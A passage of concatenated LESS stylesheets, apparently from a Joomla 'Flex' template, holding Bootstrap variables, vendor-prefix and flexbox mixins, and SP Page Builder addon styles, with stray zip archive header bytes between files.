@panel-primary-text:          #fff;
@panel-primary-border:        @brand-primary;
@panel-primary-heading-bg:    @brand-primary;

@panel-success-text:          @state-success-text;
@panel-success-border:        @state-success-border;
@panel-success-heading-bg:    @state-success-bg;

@panel-info-text:             @state-info-text;
@panel-info-border:           @state-info-border;
@panel-info-heading-bg:       @state-info-bg;

@panel-warning-text:          @state-warning-text;
@panel-warning-border:        @state-warning-border;
@panel-warning-heading-bg:    @state-warning-bg;

@panel-danger-text:           @state-danger-text;
@panel-danger-border:         @state-danger-border;
@panel-danger-heading-bg:     @state-danger-bg;


//== Thumbnails
//
//##

//** Padding around the thumbnail image
@thumbnail-padding:           4px;
//** Thumbnail background color
@thumbnail-bg:                @body-bg;
//** Thumbnail border color
@thumbnail-border:            #ddd;
//** Thumbnail border radius
@thumbnail-border-radius:     @border-radius-base;

//** Custom text color for thumbnail captions
@thumbnail-caption-color:     @text-color;
//** Padding around the thumbnail caption
@thumbnail-caption-padding:   9px;


//== Wells
//
//##

@well-bg:                     #f5f5f5;
@well-border:                 darken(@well-bg, 7%);


//== Badges
//
//##

@badge-color:                 #fff;
//** Linked badge text color on hover
@badge-link-hover-color:      #fff;
@badge-bg:                    @gray-light;

//** Badge text color in active nav link
@badge-active-color:          @link-color;
//** Badge background color in active nav link
@badge-active-bg:             #fff;

@badge-font-weight:           bold;
@badge-line-height:           1;
@badge-border-radius:         10px;


//== Breadcrumbs
//
//##

@breadcrumb-padding-vertical:   8px;
@breadcrumb-padding-horizontal: 15px;
//** Breadcrumb background color
@breadcrumb-bg:                 #f5f5f5;
//** Breadcrumb text color
@breadcrumb-color:              #ccc;
//** Text color of current page in the breadcrumb
@breadcrumb-active-color:       @gray-light;
//** Textual separator for between breadcrumb elements
@breadcrumb-separator:          "/";


//== Carousel
//
//##

@carousel-text-shadow:                        0 1px 2px rgba(0,0,0,.6);

@carousel-control-color:                      #fff;
@carousel-control-width:                      15%;
@carousel-control-opacity:                    .5;
@carousel-control-font-size:                  20px;

@carousel-indicator-active-bg:                #fff;
@carousel-indicator-border-color:             #fff;

@carousel-caption-color:                      #fff;


//== Close
//
//##

@close-font-weight:           bold;
@close-color:                 #000;
@close-text-shadow:           0 1px 0 #fff;


//== Code
//
//##

@code-color:                  #c7254e;
@code-bg:                     #f9f2f4;

@kbd-color:                   #fff;
@kbd-bg:                      #333;

@pre-bg:                      #f5f5f5;
@pre-color:                   @gray-dark;
@pre-border-color:            #ccc;
@pre-scrollable-max-height:   340px;


//== Type
//
//##

//** Horizontal offset for forms and lists.
@component-offset-horizontal: 180px;
//** Text muted color
@text-muted:                  @gray-light;
//** Abbreviations and acronyms border color
@abbr-border-color:           @gray-light;
//** Headings small color
@headings-small-color:        @gray-light;
//** Blockquote small color
@blockquote-small-color:      @gray-light;
//** Blockquote font size
@blockquote-font-size:        (@font-size-base * 1.25);
//** Blockquote border color
@blockquote-border-color:     @gray-lighter;
//** Page header border color
@page-header-border-color:    @gray-lighter;
//** Width of horizontal description list titles
@dl-horizontal-offset:        @component-offset-horizontal;
//** Horizontal line color.
@hr-border:                   @gray-lighter;
PK!Z>@>@flex/less/mixins.lessnu&1i�// Vendor Prefixes
//
// All vendor mixins are deprecated as of v3.2.0 due to the introduction of
// Autoprefixer in our Gruntfile. They will be removed in v4.

// - Animations
// - Backface visibility
// - Box shadow
// - Box sizing
// - Content columns
// - Hyphens
// - Placeholder text
// - Transformations
// - Transitions
// - User Select

.clearfix() {
  &:before,
  &:after {
    content: " "; // 1
    display: table; // 2
  }
  &:after {
    clear: both;
  }
}


// Animations
.animation(@animation) {
  -webkit-animation: @animation;
       -o-animation: @animation;
          animation: @animation;
}
.animation-name(@name) {
  -webkit-animation-name: @name;
          animation-name: @name;
}
.animation-duration(@duration) {
  -webkit-animation-duration: @duration;
          animation-duration: @duration;
}
.animation-timing-function(@timing-function) {
  -webkit-animation-timing-function: @timing-function;
          animation-timing-function: @timing-function;
}
.animation-delay(@delay) {
  -webkit-animation-delay: @delay;
          animation-delay: @delay;
}
.animation-iteration-count(@iteration-count) {
  -webkit-animation-iteration-count: @iteration-count;
          animation-iteration-count: @iteration-count;
}
.animation-direction(@direction) {
  -webkit-animation-direction: @direction;
          animation-direction: @direction;
}
.animation-fill-mode(@fill-mode) {
  -webkit-animation-fill-mode: @fill-mode;
          animation-fill-mode: @fill-mode;
}

// Backface visibility
// Prevent browsers from flickering when using CSS 3D transforms.
// Default value is `visible`, but can be changed to `hidden`

.backface-visibility(@visibility){
  -webkit-backface-visibility: @visibility;
     -moz-backface-visibility: @visibility;
          backface-visibility: @visibility;
}

// Drop shadows
//
// Note: Deprecated `.box-shadow()` as of v3.1.0 since all of Bootstrap's
// supported browsers that have box shadow capabilities now support it.

.box-shadow(@shadow) {
  -webkit-box-shadow: @shadow; // iOS <4.3 & Android <4.1
          box-shadow: @shadow;
}

// Box sizing
.box-sizing(@boxmodel) {
  -webkit-box-sizing: @boxmodel;
     -moz-box-sizing: @boxmodel;
          box-sizing: @boxmodel;
}

// CSS3 Content Columns
.content-columns(@column-count; @column-gap: @grid-gutter-width) {
  -webkit-column-count: @column-count;
     -moz-column-count: @column-count;
          column-count: @column-count;
  -webkit-column-gap: @column-gap;
     -moz-column-gap: @column-gap;
          column-gap: @column-gap;
}

// Optional hyphenation
.hyphens(@mode: auto) {
  word-wrap: break-word;
  -webkit-hyphens: @mode;
     -moz-hyphens: @mode;
      -ms-hyphens: @mode; // IE10+
       -o-hyphens: @mode;
          hyphens: @mode;
}

// Flexbox (finally in Flex!)
.inline-flexbox() {
  display: -ms-inline-flexbox;  // tweener -ms- spec
  // 2013 spec
  display: -webkit-inline-flex;
  display: -moz-inline-flex;
  display: -ms-inline-flex;
  display: -o-inline-flex;
  display: inline-flex;
}
.flexbox() {
	display: -webkit-box; //iOS6, Safari 3.1-6
	display: -moz-box; 
	display: -webkit-flex; //android 4.3, IE mobile, Safari
	display: -ms-flexbox; //IE10
	display: flex;
}
.flex-wrap(@wrap) { // nowrap | wrap | wrap-reverse
    flex-wrap: @wrap;
    -ms-flex-wrap: @wrap; //IE10
    -webkit-flex-wrap: @wrap;
}
.flex-direction(@direction) {  // row | row-reverse | column | column-reverse
    -ms-flex-direction: @direction; //IE10
    -webkit-flex-direction: @direction; //android 4.3, IE mobile, Safari
    flex-direction: @direction;
}
.flex-align-items(@align-items: center) { // flex-start | flex-end | center | baseline | stretch 
	-webkit-box-align: @align-items; //android 4.2
    -webkit-align-items: @align-items; //android 4.3, Safari
    -ms-flex-align: @align-items; //IE10
    -ms-align-items: @align-items; //IE mobile
    align-items: @align-items;
}
.flex-justify-content(@justify) { // flex-start | flex-end | center | space-between | space-around
    -webkit-box-pack: @justify;
    -webkit-justify-content: @justify;  //android 4.3, Safari
    -ms-justify-content: @justify; //IE mobile
    justify-content: @justify
}
.flex-align-content(@align-content) {  // flex-start | flex-end | center | space-between | space-around | stretch
    -webkit-align-content: @align-content;  //android 4.3, Safari
    -ms-align-content: @align-content;  //IE mobile
    align-content: @align-content;
}
.flex-align-self(@align-self) { // auto | flex-start | flex-end | center | baseline | stretch
    -webkit-align-self: @align-self; //android 4.3, Safari
    -ms-align-self: @align-self; //IE mobile
    align-self: @align-self;
}

//Old webkit fixes for android until at least 4.2 
.flex-wrap(@wrap) when (@wrap = nowrap) {
    -webkit-box-lines: single;
}
.flex-wrap(@wrap) when (@wrap = wrap) {
    -webkit-box-lines: multiple;
}

//IE10 fixes
.flex-wrap(@wrap) when (@wrap = nowrap) {
    -ms-flex-wrap: none;
}
.flex-justify-content(@justify) when (@justify = flex-start) {
    -ms-flex-pack: start;
}
.flex-justify-content(@justify) when (@justify = flex-end) {
    -ms-flex-pack: end;
}
.flex-justify-content(@justify) when (@justify = space-between) {
    -ms-flex-pack: justify;
}
.flex-align-content(@align-content) when (@align-content = flex-start) {
    -ms-flex-line-pack: start;
}
.flex-align-content(@align-content) when (@align-content = flex-end) {
    -ms-flex-line-pack: end;
}
.flex-align-content(@align-content) when (@align-content = stretch) {
    -ms-flex-line-pack: stretch;
}
.flex-align-self(@align-self) when (@align-self = flex-start) {
    -ms-flex-item-align: start;
}
.flex-align-self(@align-self) when (@align-self = flex-end) {
    -ms-flex-item-align: end;
}


.form-control {
  display: block;
  height: @input-height-base; // Make inputs at least the height of their button counterpart (base line-height + padding + border)
  padding: @padding-base-vertical @padding-base-horizontal;
  font-size: @font-size-base;
  line-height: @line-height-base;
  color: @input-color;
  background-color: @input-bg;
  background-image: none; // Reset unusual Firefox-on-Android default style; see https://github.com/necolas/normalize.css/issues/214
  border: 1px solid @input-border;
  border-radius: @input-border-radius;
  .box-shadow(inset 0 1px 1px rgba(0,0,0,.075));
  .transition(~"border-color ease-in-out .15s, box-shadow ease-in-out .15s");

  // Customize the `:focus` state to imitate native WebKit styles.
  .form-control-focus();

  // Placeholder
  .placeholder();

  // Disabled and read-only inputs
  //
  // HTML5 says that controls under a fieldset > legend:first-child won't be
  // disabled if the fieldset is disabled. Due to implementation difficulty, we
  // don't honor that edge case; we style them as disabled anyway.
  &[disabled],
  &[readonly],
  fieldset[disabled] & {
    cursor: @cursor-disabled;
    background-color: @input-bg-disabled;
    opacity: 1; // iOS fix for unreadable disabled content
  }

  // Reset height for `textarea`s
  textarea& {
    height: auto;
  }
}

.form-control-focus(@color: @input-border-focus) {
  @color-rgba: rgba(red(@color), green(@color), blue(@color), .6);
  &:focus {
    border-color: @color;
    outline: 0;
    .box-shadow(~"inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px @{color-rgba}");
  }
}

// Placeholder text
.placeholder(@color: @input-color-placeholder) {
  // Firefox
  &::-moz-placeholder {
    color: @color;
    opacity: 1; // See https://github.com/twbs/bootstrap/pull/11526
  }
  &:-ms-input-placeholder { color: @color; } // Internet Explorer 10+
  &::-webkit-input-placeholder  { color: @color; } // Safari and Chrome
}

// Transformations
.scale(@ratio) {
  -webkit-transform: scale(@ratio);
     -moz-transform: scale(@ratio);
      -ms-transform: scale(@ratio); // IE9 only
       -o-transform: scale(@ratio);
          transform: scale(@ratio);
}
.scale(@ratioX; @ratioY) {
  -webkit-transform: scale(@ratioX, @ratioY);
     -moz-transform: scale(@ratioX, @ratioY);
      -ms-transform: scale(@ratioX, @ratioY); // IE9 only
       -o-transform: scale(@ratioX, @ratioY);
          transform: scale(@ratioX, @ratioY);
}
.scaleX(@ratio) {
  -webkit-transform: scaleX(@ratio);
     -moz-transform: scaleX(@ratio);
      -ms-transform: scaleX(@ratio); // IE9 only
       -o-transform: scaleX(@ratio);
          transform: scaleX(@ratio);
}
.scaleY(@ratio) {
  -webkit-transform: scaleY(@ratio);
     -moz-transform: scaleY(@ratio);
      -ms-transform: scaleY(@ratio); // IE9 only
       -o-transform: scaleY(@ratio);
          transform: scaleY(@ratio);
}
.skew(@x; @y) {
  -webkit-transform: skewX(@x) skewY(@y);
     -moz-transform: skewX(@x) skewY(@y);
      -ms-transform: skewX(@x) skewY(@y); // See https://github.com/twbs/bootstrap/issues/4885; IE9+
       -o-transform: skewX(@x) skewY(@y);
          transform: skewX(@x) skewY(@y);
}
.translate(@x; @y) {
  -webkit-transform: translate(@x, @y);
     -moz-transform: translate(@x, @y);
      -ms-transform: translate(@x, @y); // IE9 only
       -o-transform: translate(@x, @y);
          transform: translate(@x, @y);
}
.translate3d(@x; @y; @z) {
  -webkit-transform: translate3d(@x, @y, @z);
     -moz-transform: translate3d(@x, @y, @z);
	  -ms-transform: translate3d(@x, @y, @z);
	   -o-transform: translate3d(@x, @y, @z);
          transform: translate3d(@x, @y, @z);
}
.rotate(@degrees) {
  -webkit-transform: rotate(@degrees);
      -ms-transform: rotate(@degrees); // IE9 only
       -o-transform: rotate(@degrees);
          transform: rotate(@degrees);
}
.rotateX(@degrees) {
  -webkit-transform: rotateX(@degrees);
      -ms-transform: rotateX(@degrees); // IE9 only
       -o-transform: rotateX(@degrees);
          transform: rotateX(@degrees);
}
.rotateY(@degrees) {
  -webkit-transform: rotateY(@degrees);
      -ms-transform: rotateY(@degrees); // IE9 only
       -o-transform: rotateY(@degrees);
          transform: rotateY(@degrees);
}
.perspective(@perspective) {
  -webkit-perspective: @perspective;
     -moz-perspective: @perspective;
          perspective: @perspective;
}
.perspective-origin(@perspective) {
  -webkit-perspective-origin: @perspective;
     -moz-perspective-origin: @perspective;
          perspective-origin: @perspective;
}
.transform-origin(@origin) {
  -webkit-transform-origin: @origin;
     -moz-transform-origin: @origin;
      -ms-transform-origin: @origin; // IE9 only
          transform-origin: @origin;
}


// Transitions

.transition(@transition) {
  -webkit-transition: @transition;
     -moz-transition: @transition;
       -o-transition: @transition;
          transition: @transition;
}
.transition-property(@transition-property) {
  -webkit-transition-property: @transition-property;
  	 -moz-transition-property: @transition-property;
          transition-property: @transition-property;
}
.transition-delay(@transition-delay) {
  -webkit-transition-delay: @transition-delay;
  	 -moz-transition-delay: @transition-delay;
          transition-delay: @transition-delay;
}
.transition-duration(@transition-duration) {
  -webkit-transition-duration: @transition-duration;
  	-moz-transition-duration: @transition-duration;
          transition-duration: @transition-duration;
}
.transition-timing-function(@timing-function) {
  -webkit-transition-timing-function: @timing-function;
  	-moz-transition-timing-function: @timing-function;
          transition-timing-function: @timing-function;
}
.transition-transform(@transition) {
  -webkit-transition: -webkit-transform @transition;
     -moz-transition: -moz-transform @transition;
       -o-transition: -o-transform @transition;
          transition: transform @transition;
}


// User select
// For selecting text on the page

.user-select(@select) {
  -webkit-user-select: @select;
     -moz-user-select: @select;
      -ms-user-select: @select; // IE10+
          user-select: @select;
}



// Gradients

#gradient {

  // Horizontal gradient, from left to right
  //
  // Creates two color stops, start and end, by specifying a color and position for each color stop.
  // Color stops are not available in IE9 and below.
  .horizontal(@start-color: #555; @end-color: #333; @start-percent: 0%; @end-percent: 100%) {
    background-image: -webkit-linear-gradient(left, @start-color @start-percent, @end-color @end-percent); // Safari 5.1-6, Chrome 10+
    background-image: -o-linear-gradient(left, @start-color @start-percent, @end-color @end-percent); // Opera 12
    background-image: linear-gradient(to right, @start-color @start-percent, @end-color @end-percent); // Standard, IE10, Firefox 16+, Opera 12.10+, Safari 7+, Chrome 26+
    background-repeat: repeat-x;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=1)",argb(@start-color),argb(@end-color))); // IE9 and down
  }

  // Vertical gradient, from top to bottom
  //
  // Creates two color stops, start and end, by specifying a color and position for each color stop.
  // Color stops are not available in IE9 and below.
  .vertical(@start-color: #555; @end-color: #333; @start-percent: 0%; @end-percent: 100%) {
    background-image: -webkit-linear-gradient(top, @start-color @start-percent, @end-color @end-percent);  // Safari 5.1-6, Chrome 10+
    background-image: -o-linear-gradient(top, @start-color @start-percent, @end-color @end-percent);  // Opera 12
    background-image: linear-gradient(to bottom, @start-color @start-percent, @end-color @end-percent); // Standard, IE10, Firefox 16+, Opera 12.10+, Safari 7+, Chrome 26+
    background-repeat: repeat-x;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=0)",argb(@start-color),argb(@end-color))); // IE9 and down
  }

  .directional(@start-color: #555; @end-color: #333; @deg: 45deg) {
    background-repeat: repeat-x;
    background-image: -webkit-linear-gradient(@deg, @start-color, @end-color); // Safari 5.1-6, Chrome 10+
    background-image: -o-linear-gradient(@deg, @start-color, @end-color); // Opera 12
    background-image: linear-gradient(@deg, @start-color, @end-color); // Standard, IE10, Firefox 16+, Opera 12.10+, Safari 7+, Chrome 26+
  }
  .horizontal-three-colors(@start-color: #00b3ee; @mid-color: #7a43b6; @color-stop: 50%; @end-color: #c3325f) {
    background-image: -webkit-linear-gradient(left, @start-color, @mid-color @color-stop, @end-color);
    background-image: -o-linear-gradient(left, @start-color, @mid-color @color-stop, @end-color);
    background-image: linear-gradient(to right, @start-color, @mid-color @color-stop, @end-color);
    background-repeat: no-repeat;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=1)",argb(@start-color),argb(@end-color))); // IE9 and down, gets no color-stop at all for proper fallback
  }
  .vertical-three-colors(@start-color: #00b3ee; @mid-color: #7a43b6; @color-stop: 50%; @end-color: #c3325f) {
    background-image: -webkit-linear-gradient(@start-color, @mid-color @color-stop, @end-color);
    background-image: -o-linear-gradient(@start-color, @mid-color @color-stop, @end-color);
    background-image: linear-gradient(@start-color, @mid-color @color-stop, @end-color);
    background-repeat: no-repeat;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=0)",argb(@start-color),argb(@end-color))); // IE9 and down, gets no color-stop at all for proper fallback
  }
  .radial(@inner-color: #555; @outer-color: #333) {
    background-image: -webkit-radial-gradient(circle, @inner-color, @outer-color);
    background-image: radial-gradient(circle, @inner-color, @outer-color);
    background-repeat: no-repeat;
  }
  .striped(@color: rgba(255,255,255,.15); @angle: 45deg) {
    background-image: -webkit-linear-gradient(@angle, @color 25%, transparent 25%, transparent 50%, @color 50%, @color 75%, transparent 75%, transparent);
    background-image: -o-linear-gradient(@angle, @color 25%, transparent 25%, transparent 50%, @color 50%, @color 75%, transparent 75%, transparent);
    background-image: linear-gradient(@angle, @color 25%, transparent 25%, transparent 50%, @color 50%, @color 75%, transparent 75%, transparent);
  }
}


// Opacity

.opacity(@opacity) {
  opacity: @opacity;
  // IE8 filter
  @opacity-ie: (@opacity * 100);
  filter: ~"alpha(opacity=@{opacity-ie})";
}
PK!,�&�<�<�flex/less/pagebuilder.lessnu&1i�
/* Fixing Container and left/right when SPPB page is inside Joomla Articles */
.has-left-right-modules {
	padding-top:25px;
	margin:0 auto;
	
	.sppb-row-container {
		width:100%;
		padding:0;
	}
	.sppb-in-article {
		padding:0 15px!important;
		margin:0 auto!important;
		
		.sp-column {
			padding:15px 0 0 0;
		}
	}
}

/* Fixing Container */
.sppb-row-container {
  margin-right: auto;
  margin-left: auto;
  padding-left: 15px;
  padding-right: 15px;
}

@media (min-width: 768px) {
  .sppb-row-container {
    width: 750px;
  }
  .layout-boxed .has-left-right-modules {
		.sppb-in-article-left,
		.sppb-in-article-right {
			.sp-column {
				padding:25px 15px;
			}
		}
	}
}
@media (min-width: 992px) {
	.sppb-row-container {
		width: 970px;
	}
}
@media (min-width: 1200px) {
  .sppb-row-container {
    width: 1170px;
  }
}


/*=========================================
 *===  Start Page Builder Addons	 =====
 *=======================================*/

// Fixes for SPPB 3.x (margin top/bottom)
.sppb-container {
	margin-top:0;
	margin-bottom:0;
}


// Call to Action addon
.sppb-addon-cta {
	.sppb-addon-title {
		line-height:1.2;
	}
	.sppb-cta-subtitle{
		margin-bottom: 0;
		line-height:1.5;
	}
	.sppb-btn {
		i {
			line-height:1.3;
			margin-right:6px;
			&.pe {
				font-size:130%;
				vertical-align:middle;
				line-height:1.4;
			}
		}
	}
	.sppb-btn-lg {
		line-height:1.5;
	}
}

//Image (single) addon
.sppb-addon-single-image {
	.sppb-addon-content {
		a {
			.overlay {
				position:relative;
				width:100%;
				height:100%;
				
					>i {
						
						position:absolute;
						display:block;
						width:100%;
						height:auto;
						top:50%;
						margin-top:0;
						color:#fff;
						font-size:250%;
						z-index:2;
						font-weight:800;
						opacity:0;
						.transition(400ms);
						
						&:before {
							width:80px;
							height:80px;
							padding:10px;
							border-radius:5px;
						}
		
					}
					
			&:after {
				content:"";
				color:#fff;
				position:absolute;
				width:100%;
				height:100%;
				top:0;
				left:0;
				opacity:0;
				.transition(300ms);
			}
						
				&:hover {
					&:after {
						opacity:1;
					}
					>i {
						opacity:1;
						margin-top:-25px;
							&:before {
								opacity:1;
							}
					}
				}
			}
		
				
		}
	}
}

//Image content addon
.sppb-addon-image-content {
	position: relative;
	
	.sppb-image-holder {
		position: absolute;
		top: 0;
		width: 50%;
		height: 100%;
		background-position: 50%;
		background-size:cover;
		background-repeat:no-repeat;
	}

	&.aligment-left {

		.sppb-image-holder {
			left: 0;
		}

		.sppb-content-holder {	
			padding: 40px 40px 40px 0;
			
			.sppb-btn {
				&.sppb-btn-lg {
				 font-size:110%;
				}
				>i.left {
					font-size:110%;
					margin-right:8px;
					margin-left:-2px;
					
					&.pe {
						font-size:125%;
						vertical-align:top;
						line-height:1.1;
					}
				}
				>i.right {
					font-size:110%;
					margin-left:8px;
					margin-right:-2px;
					
					&.pe {
						font-size:125%;
						vertical-align:top;
						line-height:1.1;
					}
				}
			}
		}
		
	}

	&.aligment-right {
		.sppb-image-holder {
			right: 0;
		}

		.sppb-content-holder {
			padding: 40px 0 40px 40px;
			
			.sppb-btn {
				&.sppb-btn-lg {
				 font-size:110%;

				}
				>i.right {
					font-size:110%;
					line-height:0.9;
					margin-right:8px;
					margin-left:-2px;
					
					&.pe {
						font-size:125%;
						vertical-align:top;
						line-height:1.1;
					}
				}
			}
		}
	}

}

//Button Group
.sppb-addon-button-group {
	.sppb-btn {
		>i.fa, >i.fas {
			margin-right:4px;
		}
		>i.pe {
			margin:-2px 4px 0 -3px;
			font-size:115%;
			vertical-align:middle;
			line-height:1;
		}
	}
}
//Bootstrap Modal Popup
.sppb-modal-content {
	.sppb-modal-header {
		padding:20px 30px;
		
	}
	.sppb-modal-body {
		padding:30px;
	}
	.sppb-close {
		position:absolute;
		right:12px;
		top:7px;
		font-size:200%;
		z-index:9;
	}
	
}
.sppb-modal-selector, .sppb-selector {
	&.modal-selector-image {
		margin:0 auto;
		display:inline-block;
		width:auto;
		text-align:center;
	}
	&.centered {
		display:table;
		text-align:center;
	}
}
.firefox .sppb-modal-selector.modal-selector-image {
	display:block;
}

//Modal Popup
.modal-text {
	height:auto!important; /* fix for height when Modal addon has Text content */
}
.sppb-btn {
	&.sppb-btn-lg {
		&.sppb-selector {
			
			font-size:125%;
			>i.fa, >i.fas {
				margin-right:6px;
			}
			>i.pe {
				margin-right:6px;
				margin-top:-3px;
				vertical-align:middle;
			}
		}
	}
}
//Loading icon (svg)
div.sppb_prettyphoto { 
	.pp_loaderIcon{
		position:fixed;
		top:50%;
		left:50%;
		margin-top:-25px;
		margin-left:-25px;
		width:50px;
		height:50px;
		background: url(../images/loader.svg) center center no-repeat;
	}
}


/* End Page Builder Addons
 *=======================================*/


/* Addons */
.sppb-addon h3.sppb-addon-title {
	margin:20px 0;
	width:auto;
	padding-right:30px;
	box-shadow: inset 0 -1px 0 #ddd;
	display:inline-table;
	line-height:1.3;
	
	&:after{
		clear: both;
		display:block;
		float:left;
		content:"";
		position:relative;
		height:2px;
		width:70%;
		margin:10px 30% 0 0;
		border-radius:2px;
		padding: 0;
	}	
}
.pull-left {
	.sppb-icon {
		margin-right:10px;
	}
}
.pull-right {
	.sppb-icon {
		margin-left:10px;
	}
}

/* sppb accordion */
.sppb-panel-modern {
	background: transparent;
	border: 1px solid #ddd;
	.sppb-panel-body {
		border-top-color: @major_color;
	}
	>.sppb-panel-heading {
		background: transparent;
		color:lighten(@text_color, 10%);
		
		.sppb-toggle-direction > i {
			font-size:20px;
			width:30px;
			text-align:center;
		}
	}
}


.sppb-panel-default {
  border: none;
	  >.sppb-panel-heading {
		  background-color: transparent;
		  margin: 5px 0 0 0;
		  padding: 10px 20px;
		  cursor: pointer;
		  border: 1px solid #ddd;
		  border-radius:5px;
		  
		&.active {
		   border-radius:5px 5px 0 0;
		}	
	  
		+.sppb-panel-collapse > .sppb-panel-body {
		  line-height: 26px;
		  padding:20px 25px;
		  border: 1px solid #ddd;
		  border-radius:0 0 5px 5px;
		  border-top: 0;
		}
		
	}
}
.sppb-panel-primary {
  border: none;
	  >.sppb-panel-heading {
		  color:#fff;
		  margin: 5px 0 0 0;
		  padding: 10px 20px;
		  cursor: pointer;
		  border: none;
		  border-radius:5px;
		  
		&.active {
		   border-radius:5px 5px 0 0;  
		}	
	  
		+.sppb-panel-collapse > .sppb-panel-body {
		  line-height: 26px;
		  padding:20px 25px;
		  border: 1px solid #ddd;
		  border-radius:0 0 5px 5px;
		  border-top: 0;
		}
		
	}
}
.sppb-panel-default,
.sppb-panel-primary {	
	>.sppb-panel-heading,
	>.sppb-panel-heading.active {
		
		&:before {
			font-family:'ap-arrows';
			font-size:11px;
			margin-right:5px;
			float:right;
		}
	
	}
}
.sppb-panel-default,
.sppb-panel-primary { 
	>.sppb-panel-heading {
		&:before {
		  content:"\e60c"; 
		}
	}
}
.sppb-panel-default,
.sppb-panel-primary {
	>.sppb-panel-heading.active {
		&:before {
		  content:"\e60b";
		}  
	}
}
// "Flex" style
.sppb-panel-flex  {
	  border: none;
		  >.sppb-panel-heading {
				border: none;
				border-bottom: 1px solid #ddd;
				border-radius:0;
				padding: 10px 12px;
				margin-bottom: 0;
				
				&:before {
				  content:""; 
				}	
				&:after {
					font-family:'ap-arrows';
					content:"\e605";
					float:right;
					font-size:10px;
					margin-right:10px;
					.transition(all .3s ease);
					-webkit-transform:rotate(90deg);
					-moz-transform:rotate(90deg);
					-ms-transform:rotate(90deg);
					-o-transform:rotate(90deg);
					transform:rotate(90deg);
				}
			  
			&.active {
			   border-radius:7px 7px 0 0;

				&:after {
					font-family:'ap-arrows';
					font-size:10px;	
					-webkit-transform:rotate(-90deg);
					-moz-transform:rotate(-90deg);
					-ms-transform:rotate(-90deg);
					-o-transform:rotate(-90deg);
					transform:rotate(-90deg);	  
				}  
			}	
		  
			+.sppb-panel-collapse > .sppb-panel-body {
			  line-height: 26px;
			  padding:20px 15px;
			  border:0;
			  border-radius:0;
			}
			
		}		

}
.sppb-panel-heading {
	.sppb-panel-title {
		font-size: 105%;
		font-weight: normal;

		>i.fa, >i.fas {
			margin-right:10px;
		}
				
		>i.pe {
			margin-right:7px;
			vertical-align:top;
			line-height:1.3;
			font-size:120%;
			font-weight:500;
		}
	}
}



// Icon Addon
.sppb-icon {
	>span {
		>i {
		vertical-align:middle;
		}
	}
}

// Icons Addon (inline icons)
.flex-icons {
	display:block;
	.flex-icon-wrap {
		display:inline-table;
		.transition(all .25s ease-in-out);
		
		 a {
			.transition(all .25s ease-in-out);
			opacity:1;
			
			span {
				display:inline-table;
				vertical-align:middle;
				i {
					vertical-align:middle;
					margin-top:-2px;
					text-align:center;
			
					&.fa {	
						margin-top:0;
					}
					&.fas {
						margin-top:0;
					}
				}
			}
			&:hover {
				opacity:0.85;
				
			}
		 }

		&:last-child {
			margin-right:0;	
		}
	}
	&.zoom {
		.flex-icon-wrap:hover, .flex-icon-wrap:active { 
			-webkit-transform: scale(1.1);
			-moz-transform: scale(1.1);
			-ms-transform: scale(1.1);
			-o-transform: scale(1.1);
			transform: scale(1.1); 
		}
	}
}


// Tabs
.mod-sppagebuilder {
	.sppb-nav-tabs {
		>li {
			display:table-cell!important;
		}
	}
}
.sppb-nav-tabs {
  border-bottom:0;
		>li {
			
			float:none;
			display:table-cell;
			width:1%;
			text-align:center;
		
			
			>a {
				font-size: inherit;
				font-weight: normal;
				background:#F7F7F7;
				border:0;
				border:1px solid #eee;
				border-bottom:1px solid #ddd;
				border-radius: 4px 4px 0 0;
				margin:0;
			}
		}
		
		>li.active {
			
			>a {
				background:transparent;border-bottom:1px solid #fff;border-left:1px solid #ddd;border-right:1px solid #ddd;border-top-width:1px;
				&:hover,
				&:focus {
					background:transparent;border-bottom:1px solid #fff;border-left:1px solid #ddd;border-right:1px solid #ddd;border-top-width:1px;
				}
			}
		}
		.pe {
			font-size:120%;
			vertical-align:middle;
			line-height:1;
			margin-top:-3px;
			margin-right:5px;
			&.bold {
				font-weight:600;
			}
		}
	
}
//Modern and Lines style
.sppb-nav-modern, .sppb-nav-lines {
	>li {
		>a {
			padding-left:25px;
			padding-right:25px;
		}
	}
}
// Flex style
.flex {
	.sppb-tab {
		.sppb-nav-tabs {
			
			>li {
				box-shadow:inset 0 -1px 0px #ddd;
				>a {
					background:#F7F7F7;border:0;border:1px solid #eee;border-bottom:1px solid #ddd;margin:0 2px;
				}
			}
			
			>li.active {
				>a {
					background:transparent;border-bottom:1px solid #fff;border-right:1px solid #ddd;border-left:1px solid #ddd;border-top-width:2px;
					&:hover,
					&:focus {
						background:transparent;border-bottom:1px solid #fff;border-right:1px solid #ddd;border-top-width:2px;
					}
				}
			}
		}
		.sppb-tab-content {
			padding:5% 3%;
	    }
	}
}

.sppb-tab {
	.sppb-tab-content {
		padding:2%;
		text-align:left;
	}
	.sppb-nav-tabs-content{
		border:none;
		padding:5% 3%;
	}
	
	/* Subtitle (from SPPB 3.6.9) */
	.sppb-tab-subtitle {
		display:none;
		clear:both;
		font-size:90%;
		padding:7px 0 0;
	}
	li.active {
		.sppb-tab-subtitle {
			display:block;
		}
	}
}
// Tabs (pills style)
.sppb-nav-pills {
	>li {
		float:none;
		display:table-cell;
		width:1%;
		text-align:center;
		>a {
			margin:0 1%;
			.transition(300ms);
			font-size: inherit;
			font-weight: normal;
			
			.pe {
				font-size:120%;
				vertical-align:middle;
				line-height:1;
				margin-top:-3px;
				margin-right:5px;
				&.bold {
					font-weight:600;
				}
			}
		}
		&.active {
			>a {
				box-shadow:none;
				
				&:focus {
				  background:transparent;
				}
			}
		}
		
	}
	& + .sppb-tab-content {
		padding:2% 1%;
	}
}

// Tabs (pills style) with "icons" class
.sppb-addon-tab.icons {
	.sppb-tab {
		.sppb-nav-pills {
			margin:0 auto;
			text-align:center;
			.transition(300ms);	
			>li {
				display:inline-table;
				>a {
					text-align:center;
					margin:0;
					box-shadow:none;
					.transition(300ms);
					
					&:hover,
					&:focus {
						box-shadow:none;
						background:none;
					}
					i {
						text-align:center;
						font-size:200%;
						line-height:1;
						.transition(300ms);
						
						&.pe {
							font-size:300%;
						}
					}
				}
				&.active {
					>a {
						box-shadow:none;
						  
						&:focus {
							background:transparent;
						}
					}
				}	
			}
		}
	}
	.sppb-tab-content {
